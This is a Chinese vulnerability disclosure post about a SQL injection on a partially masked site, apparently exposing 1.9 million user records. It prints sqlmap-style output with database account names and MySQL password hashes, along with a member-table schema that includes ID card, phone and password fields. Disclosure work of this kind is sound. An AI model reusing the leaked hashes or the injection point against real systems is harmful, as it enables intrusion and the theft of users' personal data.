首页 » 漏洞 » 某处SQL注射涉及一百九十万用户数据

某处SQL注射涉及一百九十万用户数据

 
code 区域
http://**.**.**.**/hd/2016/dcc/nei.php?id=10

某处SQL注射涉及一百九十万用户数据

当前用户

某处SQL注射涉及一百九十万用户数据

当前数据库

某处SQL注射涉及一百九十万用户数据

跑了半小时数据库所有账号/密码...

code 区域
database management system users password hashes:

[*] 40407root [1]:

password hash: *67C73970F8643FF618868E5DFEB081A4DAEBB56C

[*] 40407test1 [1]:

password hash: *B09107FC2DDF41BB5E48C4DDE9FA1E8381FF6F56

[*] dev [1]:

password hash: *699A17274CB0FCF25494A88E972BDAEC9B0B6128

[*] lepus_user [1]:

password hash: *67C73970F8643FF618868E5DFEB081A4DAEBB56C

[*] mmm_agent [1]:

password hash: *807A758851B755A4F0410EDDB645511D81038D51

[*] mmm_monitor [1]:

password hash: *CE1588D795CF5614014320ABB8BBE42DDC6AF33C

[*] quzg [1]:

password hash: *5B325FC9C5BA38B4BCCA61909004D3C7B1F19B36

[*] replication [1]:

password hash: *CA0ECAE23F41867A592A4939CAA9A4CF94025C8F

[*] root [2]:

password hash: *D11EBDBA68C3A96F0A86690D551557B080359A2B

password hash: *F7C86655FAAD98C2EC392BEBD7B71C8313BE8038

[*] test [1]:

password hash: *765840380CAF1C11E8F6E4078B78B2A82FCF9B65

[*] yiky [1]:

password hash: *9D7BB0E9C0FA87BF26FE7200D369720689E127F0

跑表太慢了 直接去看用户表了

用户量

某处SQL注射涉及一百九十万用户数据

code 区域
Database: 40407data

Table: dede_member

[37 columns]

+--------------+-----------------------+

| Column | Type |

+--------------+-----------------------+

| address | varchar(100) |

| birthday | varchar(15) |

| cardid | varchar(25) |

| cardpic | varchar(120) |

| checkcard | tinyint(1) |

| checkmail | smallint(6) |

| checktel | smallint(6) |

| dymail | tinyint(1) |

| dytel | tinyint(1) |

| email | char(50) |

| exptime | smallint(6) |

| face | varchar(100) |

| joinip | char(16) |

| jointime | int(10) unsigned |

| login_key | varchar(32) |

| login_type | varchar(30) |

| loginip | char(16) |

| logintime | int(10) unsigned |

| lovemsg | varchar(100) |

| matt | smallint(5) unsigned |

| mid | mediumint(8) unsigned |

| money | mediumint(8) unsigned |

| mtype | varchar(20) |

| name | varchar(20) |

| pwd | char(32) |

| rank | smallint(5) unsigned |

| safeanswer | char(30) |

| safequestion | smallint(5) unsigned |

| scores | mediumint(8) unsigned |

| sex | enum('??','??','???? |

| spacesta | smallint(6) |

| tel | varchar(15) |

| uname | char(36) |

| uptime | int(11) |

| userid | char(20) |

| yqmid | mediumint(8) |

| zfmm | char(32) |

+--------------+-----------------------+

神呐 跑了一个小时才跑完columns

某处SQL注射涉及一百九十万用户数据

本来想搞个脚本跑一下 时间问题 不深入了

漏洞证明:

修复方案:

原文链接:某处SQL注射涉及一百九十万用户数据,转载请注明来源!

0